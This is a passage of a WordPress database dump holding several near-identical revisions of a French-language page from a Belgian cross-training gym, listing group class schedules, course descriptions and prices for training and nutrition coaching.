padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:01:59', '2013-07-03 17:01:59', '', 11, 'http://www.crosstrainingcenter.be/?p=179', 0, 'revision', '', 0),
(180, 1, '2013-07-03 17:02:21', '2013-07-03 17:02:21', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n\r\n<table >\r\n<tr class=\"tabb\">\r\n<td >LUNDI</td>\r\n<td >MARDI</td>\r\n<td >MERCREDI</td>\r\n<td >JEUDI</td>\r\n<td >VENDREDI</td>\r\n</tr>\r\n<tr class=\"tabb\">\r\n<td >17h30</td>\r\n<td >TRX</td>\r\n<td >CARDIO</td>\r\n<td >RIP-KETTLE</td>\r\n<td >GLFE</td>\r\n</tr>\r\n</table>\r\n\r\n\r\n\r\nEn semaine :\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"theure\">17h30</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">18h15</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td  class=\"theure\">19h00</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">19h45</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; border-bottom: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:02:21', '2013-07-03 17:02:21', '', 11, 'http://www.crosstrainingcenter.be/?p=180', 0, 'revision', '', 0),
(181, 1, '2013-07-03 17:03:11', '2013-07-03 17:03:11', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n\r\n<table >\r\n<tr class=\"tabb\">\r\n<td >LUNDI</td>\r\n<td >MARDI</td>\r\n<td >MERCREDI</td>\r\n<td >JEUDI</td>\r\n<td >VENDREDI</td>\r\n</tr>\r\n<tr class=\"tabb\">\r\n<td >17h30</td>\r\n<td >TRX</td>\r\n<td >CARDIO</td>\r\n<td >RIP-KETTLE</td>\r\n<td >GLFE</td>\r\n</tr>\r\n</table>\r\n\r\n\r\n\r\nEn semaine :\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"theure\">17h30</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">18h15</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td  class=\"theure\">19h00</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">19h45</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; border-bottom: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:03:11', '2013-07-03 17:03:11', '', 11, 'http://www.crosstrainingcenter.be/?p=181', 0, 'revision', '', 0),
(186, 1, '2013-07-03 17:30:27', '2013-07-03 17:30:27', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n\r\n<table >\r\n<tr >\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\" >MARDI</td>\r\n<td class=\"ttitreh\" >MERCREDI</td>\r\n<td class=\"ttitreh\" >JEUDI</td>\r\n<td  class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr >\r\n<td class=\"ttitre\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n</table>\r\n\r\n\r\n\r\nEn semaine :\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td  class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 